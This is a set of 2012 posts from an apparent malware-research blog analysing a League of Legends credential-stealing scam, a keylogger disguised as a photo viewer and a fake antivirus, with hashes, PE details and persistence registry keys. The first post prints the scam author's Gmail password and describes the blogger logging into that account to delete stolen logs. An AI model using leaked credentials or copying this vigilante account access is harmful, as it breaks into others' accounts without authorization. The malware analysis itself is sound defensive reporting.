tag:blogger.com,1999:blog-16706458963035807542024-03-14T04:49:15.279+00:00MalwareDisasters TeamUnknownnoreply@blogger.comBlogger40125tag:blogger.com,1999:blog-1670645896303580754.post-29646817479651329082012-09-13T15:16:00.001+01:002012-09-13T15:16:26.322+01:00League of legends Malware Attack<div style="text-align: justify;">
As you may already know,cyber criminals find different ways to infect computers and steal sensitive information which later they use for their bad purposes.This time,at facebook i stumbled upon a League of legends themed scam,needless to say that most of my friends are also victims.They "offer" free riot points.Let's have a look then.</div>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="http://img337.imageshack.us/img337/1958/20120815201908.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="144" src="http://img337.imageshack.us/img337/1958/20120815201908.png" width="320" /></a></div>
<br />
<br />
As you can see,it's just a very "amateur" project,probably written in VB. To me,it looks kinda "phishy" and i really doubt whether it works or not.I would also like to mention that Riot INC is a very trustworthy company,don't try to search for any "hacks" that will give you Riot points,you will most likely fail and end up getting scammed or infected.<br />
<br />
What was my first thoughts?It's just a regular stealer which will send your information to the author .I was right. Let's check the network activity,when you press the button "Press Here For RP".<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="http://img214.imageshack.us/img214/9189/20120815202617.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="246" src="http://img214.imageshack.us/img214/9189/20120815202617.png" width="320" /></a></div>
<br />
<br />
<div style="text-align: justify;">
I guess,you may have already noticed some strange network activities. But really,what is it?I don't understand a thing,that's because the packets are encrypted. So,where are my information sent?I used a tool called .NET Reflector,this tool will be able to enlighten us. Let's dive into a real debugger and grab more information about the author.</div>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="http://img502.imageshack.us/img502/1041/20120812202150.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="246" src="http://img502.imageshack.us/img502/1041/20120812202150.png" width="320" /></a></div>
<br />
<br />
<div style="text-align: justify;">
As you can see,he's using the smtp.gmail client to receive the logs and the logs are sent to the "red blurred" gmail.By the way,i am not that bad to publish his e-mail,i will tell you later why. He only wants Textbox.1 which is obviously your username,and textbox.2 which is your password.The subject of the email should be victim's username and the body should contain the password.</div>
<div style="text-align: justify;">
<br /></div>
<div style="text-align: justify;">
His Gmail password is 59347763,if the password is changed,then this programme will be useless,as it won't be able to get past through the gmail verification,therefore the logs won't be sent. Using google i was able to find even more information about the author. He got the idea of creating a phising applicaiton when he saw a tutorial at YouTube. Here,he's seeking for help and he gave his email to contact him.</div>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="http://img99.imageshack.us/img99/6405/20120815204617.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="65" src="http://img99.imageshack.us/img99/6405/20120815204617.png" width="320" /></a></div>
<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="http://img10.imageshack.us/img10/825/20120815204851.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="63" src="http://img10.imageshack.us/img10/825/20120815204851.png" width="320" /></a></div>
<br />
<br />
What literally shocked me is that,he's only 15 years old and he's coming from Greece,from my country. Here he wants to buy a "Spy Recording Camera".<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="http://img15.imageshack.us/img15/7376/20120815205118.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="221" src="http://img15.imageshack.us/img15/7376/20120815205118.png" width="320" /></a></div>
<br />
<br />
<div style="text-align: justify;">
What great times do we live in,even a 15 years old kid can create his own phising application and start stealing information,just from a simple tutorial. There's too much freedom in the internet or what. Since he is only 15 years old (we have the same age),i don't want to ruin his life and that's why i didn't show you his email. I logged at his gmail and deleted all the logs,i also warned him that the next time,i won't be that good. This application should be detected as a PUP(Potentially unwanted programme).</div>
<br />
<br />
<div style="text-align: center;">
<a href="https://www.virustotal.com/file/77186a0df7e1e33e619e1f0bc1491cf975749d378111cd72e2b4d883dfc2a9b3/analysis/">https://www.virustotal.com/file/77186a0df7e1e33e619e1f0bc1491cf975749d378111cd72e2b4d883dfc2a9b3/analysis/</a></div>
<div style="text-align: center;">
<br /></div>
I just wanted to show you how easy is nowadays to create your own phising programme, and start stealing credentials. Stay safe!<br />
<br />
Phillip, Malware Researcher<br />
<br />
<br />
<br />
<br />
<br />
<div class="blogger-post-footer">https://twitter.com/MalwareInt</div>Unknownnoreply@blogger.com0tag:blogger.com,1999:blog-1670645896303580754.post-43135787592076796052012-07-19T10:03:00.000+01:002012-07-19T10:03:00.393+01:00I give you a picture and you give me your private data! What you say?<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="http://3.bp.blogspot.com/-ked4FbTErdk/UAWZ6B29m-I/AAAAAAAAAkw/-tBZ8TLquto/s1600/16-07-2012+16-45-35.png" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" src="http://3.bp.blogspot.com/-ked4FbTErdk/UAWZ6B29m-I/AAAAAAAAAkw/-tBZ8TLquto/s1600/16-07-2012+16-45-35.png" /></a></div>
MD5 : bf25f7588c58cd4b7cc5ac04ebfd00c5<br />
SHA1: 1c8e7315fae2a2af199bc3d79a5fec5cc8de4f79<br />
['Microsoft Visual Basic v5.0 - v6.0']<br />
<br />
<b>PE Information</b><br />
<i> Win32 Executable Microsoft Visual Basic 6 (86.2%)</i><br />
<i><span style="background-color: white;"> </span>Win32 Executable Generic (5.8%)</i><br />
<i><span style="background-color: white;"> </span>Win32 Dynamic Link Library (generic) (5.1%)</i><br />
<i><span style="background-color: white;"> </span>Generic Win/DOS Executable (1.3%)</i><br />
<i><span style="background-color: white;"> </span>DOS Executable Generic (1.3%)</i><br />
<i><br /></i><br />
<i><span style="background-color: white;"> </span>Optional Header: 0x400000</i><br />
<i><span style="background-color: white;"> </span>Address Of Entry Point: 0x1b04</i><br />
<i><span style="background-color: white;"> </span>Compile Time: 2012-01-25 10:58:42</i><br />
<i><span style="background-color: white;"> </span>Number of RVA and Sizes: 16</i><br />
<i><span style="background-color: white;"> </span>DLL: False</i><br />
<i><span style="background-color: white;"> </span>Number of Sections: 3</i><br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="http://3.bp.blogspot.com/-HLPnPLS7ows/UAWZ_6_URYI/AAAAAAAAAk4/pdXIHjyio88/s1600/16-07-2012+16-53-02.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="43" src="http://3.bp.blogspot.com/-HLPnPLS7ows/UAWZ_6_URYI/AAAAAAAAAk4/pdXIHjyio88/s400/16-07-2012+16-53-02.png" width="400" /></a></div>
<br />
<span style="background-color: white;"><i>[IMAGE_RESOURCE_DIRECTORY]</i></span><br />
<i style="background-color: white;"><span style="background-color: white;"> </span></i><i>0x2B000 0x0 Characteristics: 0x0 </i><br />
<i style="background-color: white;"><span style="background-color: white;"> </span></i><i>0x2B004 0x4 TimeDateStamp: 0x4F1FFC81 [Wed Jan 25 12:58:41 2012 UTC]</i><br />
<i style="background-color: white;"><span style="background-color: white;"> </span></i><i>0x2B008 0x8 MajorVersion: 0x0 </i><br />
<i style="background-color: white;"><span style="background-color: white;"> </span></i><i>0x2B00A 0xA MinorVersion: 0x0 </i><br />
<i style="background-color: white;"><span style="background-color: white;"> </span></i><i>0x2B00C 0xC NumberOfNamedEntries: 0x0 </i><br />
<i style="background-color: white;"><span style="background-color: white;"> </span></i><i>0x2B00E 0xE NumberOfIdEntries: 0x3 </i><br />
<b><br /></b><br />
<b>Metadata</b><br />
<i style="background-color: white;"><span style="background-color: white;"> </span></i><i>Translation: 0x0409 0x04b0</i><br />
<i style="background-color: white;"><span style="background-color: white;"> </span></i><i>InternalName: Photo_Viewer_12_south</i><br />
<i style="background-color: white;"><span style="background-color: white;"> </span></i><i>FileVersion: 12.00</i><br />
<i style="background-color: white;"><span style="background-color: white;"> </span></i><i>CompanyName: ACDSee Image Viewer</i><br />
<i style="background-color: white;"><span style="background-color: white;"> </span></i><i>ProductName: My_Photos</i><br />
<i style="background-color: white;"><span style="background-color: white;"> </span></i><i>ProductVersion: 12.00</i><br />
<i style="background-color: white;"><span style="background-color: white;"> </span></i><i>OriginalFilename: Photo_Viewer_12_south.exe</i><br />
<br />
<b>Registry</b><br />
<i>HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run<span class="Apple-tab-span" style="white-space: pre;"> </span></i><br />
<i>NTS<span class="Apple-tab-span" style="white-space: pre;"> </span>ACDSee Image Viewer<span class="Apple-tab-span" style="white-space: pre;"> </span>c:\windows\system32\wpowercfg.exe</i><br />
<br />
<a href="https://www.virustotal.com/file/68328901f9b90246777f41eaee42998343b111a065c2e26ddb0ac13364f3852a/analysis/" target="_blank"><span style="color: orange;">VT detection rate </span><b><span style="color: red;">19</span><span style="color: black;">/37</span></b></a><br />
<br />
The malware has keylogging functionality. All captured information is sent via SMTP and displays an image run:<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="http://3.bp.blogspot.com/--E6dQgjvQ9A/UAWaf5wvY8I/AAAAAAAAAlA/TkDNWdW3P3I/s1600/16-07-2012+16-46-45.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="320" src="http://3.bp.blogspot.com/--E6dQgjvQ9A/UAWaf5wvY8I/AAAAAAAAAlA/TkDNWdW3P3I/s320/16-07-2012+16-46-45.png" width="299" /></a></div>
<br />
Do you know this girl? :-)<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://www.twitter.com/MalwareInt" target="_blank"><img border="0" height="135" src="http://3.bp.blogspot.com/-f1ynt36hKps/T_Z4vA5lJnI/AAAAAAAAAjA/GszFQ_A_YG0/s200/MalwareInt-Twitter.png" width="200" /></a></div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
Alex</div>
<br /><div class="blogger-post-footer">https://twitter.com/MalwareInt</div>Unknownnoreply@blogger.com0tag:blogger.com,1999:blog-1670645896303580754.post-31424081812764343132012-07-13T20:24:00.000+01:002012-07-13T20:24:03.703+01:00New variant of another fake antivirus program called Live Security Platinum<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="http://3.bp.blogspot.com/-Zcs1pPMNsM4/UABrRvoP_zI/AAAAAAAAAjc/N66WpA9q4do/s1600/13-07-2012+14-34-59.png" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" src="http://3.bp.blogspot.com/-Zcs1pPMNsM4/UABrRvoP_zI/AAAAAAAAAjc/N66WpA9q4do/s1600/13-07-2012+14-34-59.png" /></a></div>
<span style="font-family: Arial, Helvetica, sans-serif;">This is the icon used for the fakeAV</span><br />
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span><br />
<b><span style="font-family: Arial, Helvetica, sans-serif; font-size: large;">Technical information & PE file attribute</span></b><br />
<span style="font-family: Arial, Helvetica, sans-serif;">MD5 : 8ed72a01f6dd01cf353091492d7e96c6</span><br />
<span style="font-family: Arial, Helvetica, sans-serif;"><i>SHA1: a810430d6d26e97b1a8b48898d8effe4ed8a140e</i></span><br />
<span style="font-family: Arial, Helvetica, sans-serif;"><i>['Microsoft Visual C++ v6.0'], ['Microsoft Visual C++ 5.0'], ['Microsoft Visual C++'], ['Microsoft Visual C++ v6.0'], ['Installer VISE Custom']</i></span><br />
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span><br />
<span style="font-family: Arial, Helvetica, sans-serif;"><b>PE information & sections:</b></span><i style="background-color: white; font-family: Arial, Helvetica, sans-serif;"> </i><br />
<i style="background-color: white; font-family: Arial, Helvetica, sans-serif;"> Win32 Executable MS Visual C++ (generic) (65.2%)</i><br />
<i style="background-color: white; font-family: Arial, Helvetica, sans-serif;"> Win32 Executable Generic (14.7%)</i><br />
<i style="background-color: white; font-family: Arial, Helvetica, sans-serif;"> Win32 Dynamic Link Library (generic) (13.1%)</i><br />
<i style="background-color: white; font-family: Arial, Helvetica, sans-serif;"> Generic Win/DOS Executable (3.4%)</i><br />
<i style="background-color: white; font-family: Arial, Helvetica, sans-serif;"> DOS Executable Generic (3.4%)</i><br />
<i style="background-color: white; font-family: Arial, Helvetica, sans-serif;"><br /></i><br />
<i style="background-color: white; font-family: Arial, Helvetica, sans-serif;"> Optional Header: 0x400000</i><br />
<i style="background-color: white;"><span style="font-family: Arial, Helvetica, sans-serif;"> Address Of Entry Point: 0x1953</span></i><br />
<i><span style="background-color: white; font-family: Arial, Helvetica, sans-serif;"> </span><span style="font-family: Arial, Helvetica, sans-serif;">Compile Time: 2012-07-12 09:06:36</span></i><br />
<i><span style="background-color: white; font-family: Arial, Helvetica, sans-serif;"> </span><span style="font-family: Arial, Helvetica, sans-serif;">Number of RVA and Sizes: 16</span></i><br />
<i><span style="background-color: white; font-family: Arial, Helvetica, sans-serif;"> </span><span style="font-family: Arial, Helvetica, sans-serif;">Number of Sections: 4</span></i><br />
<div class="separator" style="clear: both; text-align: center;">
<a href="http://3.bp.blogspot.com/-hcGHFDOqXmI/UABr65XPlVI/AAAAAAAAAjk/fRzBJVVxrfU/s1600/13-07-2012+14-26-27.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="http://3.bp.blogspot.com/-hcGHFDOqXmI/UABr65XPlVI/AAAAAAAAAjk/fRzBJVVxrfU/s1600/13-07-2012+14-26-27.png" /></a></div>
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span><br />
<b style="background-color: white; font-family: Arial, Helvetica, sans-serif;">Imported DLLs and API:</b><br />
<i style="background-color: white; font-family: Arial, Helvetica, sans-serif;">[1] KERNEL32.dll </i><br />
<span style="font-family: Arial, Helvetica, sans-serif;"><i><span class="Apple-tab-span" style="white-space: pre;"> </span> 0x407000 Sleep</i></span><br />
<span style="font-family: Arial, Helvetica, sans-serif;"><i><span class="Apple-tab-span" style="white-space: pre;"> </span> 0x407004 CloseHandle</i></span><br />
<span style="font-family: Arial, Helvetica, sans-serif;"><i><span class="Apple-tab-span" style="white-space: pre;"> </span> 0x407008 GetProcAddress</i></span><br />
<span style="font-family: Arial, Helvetica, sans-serif;"><i><span class="Apple-tab-span" style="white-space: pre;"> </span> 0x40700c GetModuleHandleA</i></span><br />
<span style="font-family: Arial, Helvetica, sans-serif;"><i><span class="Apple-tab-span" style="white-space: pre;"> </span> 0x407010 InterlockedExchange</i></span><br />
<span style="font-family: Arial, Helvetica, sans-serif;"><i><span class="Apple-tab-span" style="white-space: pre;"> </span> 0x407014 SetEvent</i></span><br />
<span style="font-family: Arial, Helvetica, sans-serif;"><i><span class="Apple-tab-span" style="white-space: pre;"> </span> 0x407018 CreateFileA</i></span><br />
<span style="font-family: Arial, Helvetica, sans-serif;"><i><span class="Apple-tab-span" style="white-space: pre;"> </span> 0x40701c VirtualAllocEx</i></span><br />
<span style="font-family: Arial, Helvetica, sans-serif;"><i><span class="Apple-tab-span" style="white-space: pre;"> </span> 0x407020 LCMapStringA</i></span><br />
<span style="font-family: Arial, Helvetica, sans-serif;"><i><span class="Apple-tab-span" style="white-space: pre;"> </span> 0x407024 GetStringTypeW</i></span><br />
<span style="font-family: Arial, Helvetica, sans-serif;"><i><span class="Apple-tab-span" style="white-space: pre;"> </span> 0x407028 GetStringTypeA</i></span><br />
<span style="font-family: Arial, Helvetica, sans-serif;"><i><span class="Apple-tab-span" style="white-space: pre;"> </span> 0x40702c MultiByteToWideChar</i></span><br />
<span style="font-family: Arial, Helvetica, sans-serif;"><i><span class="Apple-tab-span" style="white-space: pre;"> </span> 0x407030 RaiseException</i></span><br />
<span style="font-family: Arial, Helvetica, sans-serif;"><i><span class="Apple-tab-span" style="white-space: pre;"> </span> 0x407034 LoadLibraryA</i></span><br />
<span style="font-family: Arial, Helvetica, sans-serif;"><i><span class="Apple-tab-span" style="white-space: pre;"> </span> 0x407038 GetOEMCP</i></span><br />
<span style="font-family: Arial, Helvetica, sans-serif;"><i><span class="Apple-tab-span" style="white-space: pre;"> </span> 0x40703c GetStartupInfoA</i></span><br />
<span style="font-family: Arial, Helvetica, sans-serif;"><i><span class="Apple-tab-span" style="white-space: pre;"> </span> 0x407040 GetCommandLineA</i></span><br />
<span style="font-family: Arial, Helvetica, sans-serif;"><i><span class="Apple-tab-span" style="white-space: pre;"> </span> 0x407044 GetVersion</i></span><br />
<span style="font-family: Arial, Helvetica, sans-serif;"><i><span class="Apple-tab-span" style="white-space: pre;"> </span> 0x407048 ExitProcess</i></span><br />
<span style="font-family: Arial, Helvetica, sans-serif;"><i><span class="Apple-tab-span" style="white-space: pre;"> </span> 0x40704c HeapFree</i></span><br />
<span style="font-family: Arial, Helvetica, sans-serif;"><i><span class="Apple-tab-span" style="white-space: pre;"> </span> 0x407050 TerminateProcess</i></span><br />
<span style="font-family: Arial, Helvetica, sans-serif;"><i><span class="Apple-tab-span" style="white-space: pre;"> </span> 0x407054 GetCurrentProcess</i></span><br />
<span style="font-family: Arial, Helvetica, sans-serif;"><i><span class="Apple-tab-span" style="white-space: pre;"> </span> 0x407058 UnhandledExceptionFilter</i></span><br />
<span style="font-family: Arial, Helvetica, sans-serif;"><i><span class="Apple-tab-span" style="white-space: pre;"> </span> 0x40705c GetModuleFileNameA</i></span><br />
<span style="font-family: Arial, Helvetica, sans-serif;"><i><span class="Apple-tab-span" style="white-space: pre;"> </span> 0x407060 FreeEnvironmentStringsA</i></span><br />
<span style="font-family: Arial, Helvetica, sans-serif;"><i><span class="Apple-tab-span" style="white-space: pre;"> </span> 0x407064 FreeEnvironmentStringsW</i></span><br />
<span style="font-family: Arial, Helvetica, sans-serif;"><i><span class="Apple-tab-span" style="white-space: pre;"> </span> 0x407068 WideCharToMultiByte</i></span><br />
<span style="font-family: Arial, Helvetica, sans-serif;"><i><span class="Apple-tab-span" style="white-space: pre;"> </span> 0x40706c GetEnvironmentStrings</i></span><br />
<span style="font-family: Arial, Helvetica, sans-serif;"><i><span class="Apple-tab-span" style="white-space: pre;"> </span> 0x407070 GetEnvironmentStringsW</i></span><br />
<span style="font-family: Arial, Helvetica, sans-serif;"><i><span class="Apple-tab-span" style="white-space: pre;"> </span> 0x407074 SetHandleCount</i></span><br />
<span style="font-family: Arial, Helvetica, sans-serif;"><i><span class="Apple-tab-span" style="white-space: pre;"> </span> 0x407078 GetStdHandle</i></span><br />
<span style="font-family: Arial, Helvetica, sans-serif;"><i><span class="Apple-tab-span" style="white-space: pre;"> </span> 0x40707c GetFileType</i></span><br />
<span style="font-family: Arial, Helvetica, sans-serif;"><i><span class="Apple-tab-span" style="white-space: pre;"> </span> 0x407080 HeapDestroy</i></span><br />
<span style="font-family: Arial, Helvetica, sans-serif;"><i><span class="Apple-tab-span" style="white-space: pre;"> </span> 0x407084 HeapCreate</i></span><br />
<span style="font-family: Arial, Helvetica, sans-serif;"><i><span class="Apple-tab-span" style="white-space: pre;"> </span> 0x407088 VirtualFree</i></span><br />
<span style="font-family: Arial, Helvetica, sans-serif;"><i><span class="Apple-tab-span" style="white-space: pre;"> </span> 0x40708c RtlUnwind</i></span><br />
<span style="font-family: Arial, Helvetica, sans-serif;"><i><span class="Apple-tab-span" style="white-space: pre;"> </span> 0x407090 WriteFile</i></span><br />
<span style="font-family: Arial, Helvetica, sans-serif;"><i><span class="Apple-tab-span" style="white-space: pre;"> </span> 0x407094 HeapAlloc</i></span><br />
<span style="font-family: Arial, Helvetica, sans-serif;"><i><span class="Apple-tab-span" style="white-space: pre;"> </span> 0x407098 VirtualAlloc</i></span><br />
<span style="font-family: Arial, Helvetica, sans-serif;"><i><span class="Apple-tab-span" style="white-space: pre;"> </span> 0x40709c HeapReAlloc</i></span><br />
<span style="font-family: Arial, Helvetica, sans-serif;"><i><span class="Apple-tab-span" style="white-space: pre;"> </span> 0x4070a0 GetCPInfo</i></span><br />
<span style="font-family: Arial, Helvetica, sans-serif;"><i><span class="Apple-tab-span" style="white-space: pre;"> </span> 0x4070a4 GetACP</i></span><br />
<span style="font-family: Arial, Helvetica, sans-serif;"><i><span class="Apple-tab-span" style="white-space: pre;"> </span> 0x4070a8 LCMapStringW</i></span><br />
<span style="font-family: Arial, Helvetica, sans-serif;"><i>[2] USER32.dll </i></span><br />
<span style="font-family: Arial, Helvetica, sans-serif;"><i><span class="Apple-tab-span" style="white-space: pre;"> </span> 0x4070b0 LoadBitmapA</i></span><br />
<span style="font-family: Arial, Helvetica, sans-serif;"><i><span class="Apple-tab-span" style="white-space: pre;"> </span> 0x4070b4 ShowWindow</i></span><br />
<span style="font-family: Arial, Helvetica, sans-serif;"><i><span class="Apple-tab-span" style="white-space: pre;"> </span> 0x4070b8 LoadImageA</i></span><br />
<span style="font-family: Arial, Helvetica, sans-serif;"><i><span class="Apple-tab-span" style="white-space: pre;"> </span> 0x4070bc LoadIconA</i></span><br />
<span style="font-family: Arial, Helvetica, sans-serif;"><i>[3] WINMM.dll </i></span><br />
<span style="font-family: Arial, Helvetica, sans-serif;"><i><span class="Apple-tab-span" style="white-space: pre;"> </span> 0x4070c4 mixerGetControlDetailsA</i></span><br />
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span><br />
<a href="https://www.virustotal.com/file/959161c7bc1736e9f83b351f46b2cc92e22cfffde6bc38dd67e12e007d27cd01/analysis/" style="background-color: white; font-family: Arial, Helvetica, sans-serif;" target="_blank"><span style="color: orange;">VT information</span></a><span style="background-color: white; font-family: Arial, Helvetica, sans-serif;"> about detection rate </span><b style="background-color: white; font-family: Arial, Helvetica, sans-serif;"><span style="color: red;">22</span>/42</b><br />
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span><br />
<span style="font-family: Arial, Helvetica, sans-serif; font-size: large;"><b>Live Security Platinum screenshots</b></span><br />
<span style="font-family: Arial, Helvetica, sans-serif;"><b>Warning popups</b></span><br />
<div class="separator" style="clear: both; text-align: center;">
<a href="http://3.bp.blogspot.com/-eEq5vCPqGUA/UABsxO6asQI/AAAAAAAAAjs/cxA6sksANK8/s1600/13-07-2012+14-40-55.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="http://3.bp.blogspot.com/-eEq5vCPqGUA/UABsxO6asQI/AAAAAAAAAjs/cxA6sksANK8/s1600/13-07-2012+14-40-55.png" /></a></div>
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span><br />
<b style="background-color: white; font-family: Arial, Helvetica, sans-serif;">Live Security Platinum GUI:</b><br />
<div class="separator" style="clear: both; text-align: center;">
<a href="http://2.bp.blogspot.com/-O4tjTgmgEnk/UABtmyCwWEI/AAAAAAAAAj0/pR3FJhGqD8Y/s1600/13-07-2012+14-43-07.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="298" src="http://2.bp.blogspot.com/-O4tjTgmgEnk/UABtmyCwWEI/AAAAAAAAAj0/pR3FJhGqD8Y/s400/13-07-2012+14-43-07.png" width="400" /></a></div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="http://3.bp.blogspot.com/-b-jjCjidGis/UABt4Wo6veI/AAAAAAAAAj8/I4OpchLpzsc/s1600/13-07-2012+2-59-22.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="298" src="http://3.bp.blogspot.com/-b-jjCjidGis/UABt4Wo6veI/AAAAAAAAAj8/I4OpchLpzsc/s400/13-07-2012+2-59-22.png" width="400" /></a></div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="http://2.bp.blogspot.com/--gYankwygIE/UABt_1_5W4I/AAAAAAAAAkE/QnB5oKiP558/s1600/13-07-2012+14-57-30.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="298" src="http://2.bp.blogspot.com/--gYankwygIE/UABt_1_5W4I/AAAAAAAAAkE/QnB5oKiP558/s400/13-07-2012+14-57-30.png" width="400" /></a></div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="http://2.bp.blogspot.com/-Qm4pqvTAHpc/UABuE293GTI/AAAAAAAAAkM/0h4QprHwAqU/s1600/13-07-2012+14-58-54.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="298" src="http://2.bp.blogspot.com/-Qm4pqvTAHpc/UABuE293GTI/AAAAAAAAAkM/0h4QprHwAqU/s400/13-07-2012+14-58-54.png" width="400" /></a></div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="http://3.bp.blogspot.com/-yMXcrwU-BQE/UABuJweJQNI/AAAAAAAAAkU/rQnkBeX_434/s1600/13-07-2012+15-00-00.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="298" src="http://3.bp.blogspot.com/-yMXcrwU-BQE/UABuJweJQNI/AAAAAAAAAkU/rQnkBeX_434/s400/13-07-2012+15-00-00.png" width="400" /></a></div>
<div class="separator" style="clear: both; text-align: center;">
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
<div class="separator" style="clear: both; text-align: left;">
<span style="background-color: white; font-family: Arial, Helvetica, sans-serif;"><span style="font-size: large;"><b>Live Security Platinum monetization</b></span></span></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="http://4.bp.blogspot.com/-9x6WNMJRDfo/UABvcCkOmiI/AAAAAAAAAkk/qE3oBigle1Y/s1600/13-07-2012+3-00-55.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="397" src="http://4.bp.blogspot.com/-9x6WNMJRDfo/UABvcCkOmiI/AAAAAAAAAkk/qE3oBigle1Y/s400/13-07-2012+3-00-55.png" width="400" /></a></div>
<div class="separator" style="clear: both; text-align: left;">
<b style="background-color: white; font-family: Arial, Helvetica, sans-serif; font-size: x-large;"><br /></b></div>
<div class="separator" style="clear: both; text-align: left;">
<b style="background-color: white; font-family: Arial, Helvetica, sans-serif; font-size: x-large;">Live Security Platinum registration</b></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="http://3.bp.blogspot.com/-5uXBfq2Ja6g/UABuWRU0wMI/AAAAAAAAAkc/HZytqnszptc/s1600/13-07-2012+3-35-58.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="272" src="http://3.bp.blogspot.com/-5uXBfq2Ja6g/UABuWRU0wMI/AAAAAAAAAkc/HZytqnszptc/s400/13-07-2012+3-35-58.png" width="400" /></a></div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<span style="font-family: Arial, Helvetica, sans-serif; line-height: 15px; text-align: -webkit-auto;">** Information obtained through the automated process malware analysis of </span><b style="font-family: Arial, Helvetica, sans-serif; line-height: 15px; text-align: -webkit-auto;">CrimewareAttack Service</b><span style="font-family: Arial, Helvetica, sans-serif; line-height: 15px; text-align: -webkit-auto;">(by </span><span style="background-color: white; font-family: Arial, Helvetica, sans-serif; line-height: 15px; text-align: -webkit-auto;"> <b>Malware<span style="color: blue;">Intelligence</span></b></span><span style="background-color: white; font-family: Arial, Helvetica, sans-serif; line-height: 15px; text-align: -webkit-auto;">).</span>
</div>
<div class="separator" style="clear: both; text-align: center;">
<span style="background-color: white; font-family: Arial, Helvetica, sans-serif; font-size: x-small; line-height: 15px; text-align: -webkit-auto;"><br /></span></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="http://www.twitter.com/MalwareInt" target="_blank"><img border="0" height="135" src="http://3.bp.blogspot.com/-f1ynt36hKps/T_Z4vA5lJnI/AAAAAAAAAjA/GszFQ_A_YG0/s200/MalwareInt-Twitter.png" width="200" /></a></div>
<div class="separator" style="clear: both; text-align: -webkit-auto;">
<span style="background-color: white; font-family: Arial, Helvetica, sans-serif; line-height: 15px;">Alex</span></div>
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span><br />
<br /><div class="blogger-post-footer">https://twitter.com/MalwareInt</div>Unknownnoreply@blogger.com0tag:blogger.com,1999:blog-1670645896303580754.post-48391086303735953532012-07-06T07:01:00.002+01:002012-07-06T07:01:49.472+01:00Generic trojan type backdoor via popular crimeware “Loader”<div class="separator" style="clear: both; text-align: center;">
<a href="http://3.bp.blogspot.com/-TlkJlcFOPj0/T_ZsHj6hBfI/AAAAAAAAAiM/Ur_4yn3AwzM/s1600/bot.png" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" src="http://3.bp.blogspot.com/-TlkJlcFOPj0/T_ZsHj6hBfI/AAAAAAAAAiM/Ur_4yn3AwzM/s1600/bot.png" /></a></div>
<span style="background-color: white;"><span style="font-family: Arial, Helvetica, sans-serif;">This is the icon used for this malware.</span></span><br />
<span style="background-color: white;"><span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></span><br />
<b style="background-color: white; font-family: Arial, Helvetica, sans-serif;">Technical information & PE file attribute</b><br />
<span style="background-color: white; font-family: Arial, Helvetica, sans-serif;">MD5 : aab21e11953aee66ff16772576ceaec0</span><br />
<span style="font-family: Arial, Helvetica, sans-serif;">SHA1: 576910d3ae484144db32dd835594c605dac90a9d</span><br />
<i><span style="font-family: Arial, Helvetica, sans-serif;">[['Microsoft Visual C++ 8'], ['VC8 -> Microsoft Corporation']</span></i><br />
<span style="background-color: white; font-family: Arial, Helvetica, sans-serif;"><br /></span><br />
<span style="background-color: white; font-family: Arial, Helvetica, sans-serif;">This malware was created and is spread through crimeware "</span><b style="background-color: white; font-family: Arial, Helvetica, sans-serif;">VertexNet Loader</b><span style="background-color: white; font-family: Arial, Helvetica, sans-serif;">".</span><br />
<b style="background-color: white; text-align: left;"><span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></b><br />
